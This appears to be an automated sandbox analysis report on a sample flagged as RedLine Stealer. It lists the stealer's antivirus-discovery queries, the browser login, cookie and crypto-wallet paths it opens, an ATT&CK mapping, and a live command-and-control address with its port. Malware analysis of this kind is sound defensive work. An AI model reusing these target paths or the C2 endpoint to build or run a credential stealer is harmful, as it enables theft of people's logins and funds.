Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Queries volume information: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Queries volume information: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation

Source: C:\Users\user\Desktop\owKQ0b029a.exe

Code function: 0_2_00C80F8F GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,DeleteObject,CloseHandle,

0_2_00C80F8F

Source: C:\Users\user\Desktop\owKQ0b029a.exe

Code function: 0_2_00C729F2 GetVersionExW,

0_2_00C729F2

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: QntRsaVyLKlY.exe, 00000016.00000002.2367553513.0000000006865000.00000004.00000020.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2373288719.0000000007C02000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 17.2.QntRsaVyLKlY.exe.3a3eb50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.PO.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.PO.exe.4116088.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.QntRsaVyLKlY.exe.3a26d30.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.QntRsaVyLKlY.exe.3a3eb50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.PO.exe.412dea8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.PO.exe.412dea8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.QntRsaVyLKlY.exe.3a26d30.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.PO.exe.4116088.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.2241712167.0000000003A26000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2262603009.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2154716570.0000000004116000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO.exe PID: 7400, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PO.exe PID: 7912, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: QntRsaVyLKlY.exe PID: 8024, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: QntRsaVyLKlY.exe PID: 6976, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File opened: C:\Users\user\AppData\Roaming\atomic\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\

Source: Yara match	File source: 17.2.QntRsaVyLKlY.exe.3a3eb50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.PO.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.PO.exe.4116088.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.QntRsaVyLKlY.exe.3a26d30.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.QntRsaVyLKlY.exe.3a3eb50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.PO.exe.412dea8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.PO.exe.412dea8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.QntRsaVyLKlY.exe.3a26d30.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.PO.exe.4116088.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.2241712167.0000000003A26000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2262603009.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2154716570.0000000004116000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO.exe PID: 7400, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PO.exe PID: 7912, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: QntRsaVyLKlY.exe PID: 8024, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: QntRsaVyLKlY.exe PID: 6976, type: MEMORYSTR

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 17.2.QntRsaVyLKlY.exe.3a3eb50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.PO.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.PO.exe.4116088.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.QntRsaVyLKlY.exe.3a26d30.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.QntRsaVyLKlY.exe.3a3eb50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.PO.exe.412dea8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.PO.exe.412dea8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.QntRsaVyLKlY.exe.3a26d30.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.PO.exe.4116088.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.2241712167.0000000003A26000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2262603009.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2154716570.0000000004116000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO.exe PID: 7400, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PO.exe PID: 7912, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: QntRsaVyLKlY.exe PID: 8024, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: QntRsaVyLKlY.exe PID: 6976, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	221 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	111 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	3 File and Directory Discovery	Remote Desktop Protocol	2 Data from Local System	11 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	Logon Script (Windows)	1 Scheduled Task/Job	4 Obfuscated Files or Information	Security Account Manager	137 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	13 Software Packing	NTDS	1 Query Registry	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	351 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	241 Virtualization/Sandbox Evasion	DCSync	241 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	111 Process Injection	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
owKQ0b029a.exe	74%	ReversingLabs	ByteCode-MSIL.Backdoor.NanoCore
owKQ0b029a.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	100%	Avira	HEUR/AGEN.1350997
C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	83%	ReversingLabs	ByteCode-MSIL.Spyware.RedLine
C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	83%	ReversingLabs	ByteCode-MSIL.Spyware.RedLine

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/envelope/	0%	URL Reputation	safe
http://tempuri.org/	0%	URL Reputation	safe
https://ipinfo.io/ip%appdata%	0%	Avira URL Cloud	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	0%	URL Reputation	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/EnvironmentSettings	0%	Avira URL Cloud	safe
http://schemas.datacontract.org/2004/07/	0%	Avira URL Cloud	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/08/addressing	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX	0%	Avira URL Cloud	safe
http://185.222.57.67:55615/	0%	Avira URL Cloud	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
https://api.ip.sb	0%	Avira URL Cloud	safe
https://api.ip.sb/geoip%USERPEnvironmentROFILE%	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/CheckConnectResponse	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/CheckConnect	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/VerifyUpdateResponse	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/actor/next	0%	URL Reputation	safe
https://api.ip.sb/geoip	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/SetEnviron	0%	Avira URL Cloud	safe
http://185.222.57.67:55615	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/GetUpdates	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/SetEnvironmentResponse	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/SetEnvironment	0%	Avira URL Cloud	safe
185.222.57.67:55615	0%	Avira URL Cloud	safe
https://api.ipify.orgcookies//settinString.Removeg	0%	Avira URL Cloud	safe
http://185.222.57.67:55615t-eq	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/GetUpdatesResponse	0%	Avira URL Cloud	safe
http://185.222.57.67:5	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/EnvironmentSettingsResponse	0%	Avira URL Cloud	safe
http://tempuri.org/0	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/VerifyUpdate	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.ip.sb	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.222.57.67:55615/	true	Avira URL Cloud: safe	unknown
185.222.57.67:55615	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ipinfo.io/ip%appdata%	PO.exe, PO.exe, 0000000F.00000002.2262603009.0000000000402000.00000040.00000400.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000011.00000002.2241712167.0000000003A26000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	tmp1165.tmp.22.dr, tmp4DCC.tmp.15.dr, tmpDB20.tmp.22.dr, tmp1176.tmp.22.dr, tmp1196.tmp.22.dr, tmp852B.tmp.15.dr, tmp15B0.tmp.15.dr, tmp4DAC.tmp.15.dr, tmpDACF.tmp.22.dr, tmp11A6.tmp.22.dr, tmp853B.tmp.15.dr, tmp475E.tmp.22.dr, tmp1145.tmp.22.dr, tmpA44D.tmp.15.dr, tmp4D7B.tmp.15.dr, tmpDAEF.tmp.22.dr, tmp4D8B.tmp.15.dr, tmpDB00.tmp.22.dr, tmpBC0D.tmp.15.dr, tmp855C.tmp.15.dr, tmp15A0.tmp.15.dr	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	tmp1165.tmp.22.dr, tmp4DCC.tmp.15.dr, tmpDB20.tmp.22.dr, tmp1176.tmp.22.dr, tmp1196.tmp.22.dr, tmp852B.tmp.15.dr, tmp15B0.tmp.15.dr, tmp4DAC.tmp.15.dr, tmpDACF.tmp.22.dr, tmp11A6.tmp.22.dr, tmp853B.tmp.15.dr, tmp475E.tmp.22.dr, tmp1145.tmp.22.dr, tmpA44D.tmp.15.dr, tmp4D7B.tmp.15.dr, tmpDAEF.tmp.22.dr, tmp4D8B.tmp.15.dr, tmpDB00.tmp.22.dr, tmpBC0D.tmp.15.dr, tmp855C.tmp.15.dr, tmp15A0.tmp.15.dr	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	tmp1165.tmp.22.dr, tmp4DCC.tmp.15.dr, tmpDB20.tmp.22.dr, tmp1176.tmp.22.dr, tmp1196.tmp.22.dr, tmp852B.tmp.15.dr, tmp15B0.tmp.15.dr, tmp4DAC.tmp.15.dr, tmpDACF.tmp.22.dr, tmp11A6.tmp.22.dr, tmp853B.tmp.15.dr, tmp475E.tmp.22.dr, tmp1145.tmp.22.dr, tmpA44D.tmp.15.dr, tmp4D7B.tmp.15.dr, tmpDAEF.tmp.22.dr, tmp4D8B.tmp.15.dr, tmpDB00.tmp.22.dr, tmpBC0D.tmp.15.dr, tmp855C.tmp.15.dr, tmp15A0.tmp.15.dr	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	PO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/CheckConnectResponse	PO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.datacontract.org/2004/07/	PO.exe, 0000000F.00000002.2265027022.0000000003138000.00000004.00000800.00020000.00000000.sdmp, PO.exe, 0000000F.00000002.2265027022.0000000003347000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000003082000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX	PO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/EnvironmentSettings	PO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000003040000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.ip.sb/geoip%USERPEnvironmentROFILE%	PO.exe, PO.exe, 0000000F.00000002.2262603009.0000000000402000.00000040.00000400.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000011.00000002.2241712167.0000000003A26000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.ip.sb	PO.exe, 0000000F.00000002.2265027022.0000000003110000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000003040000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
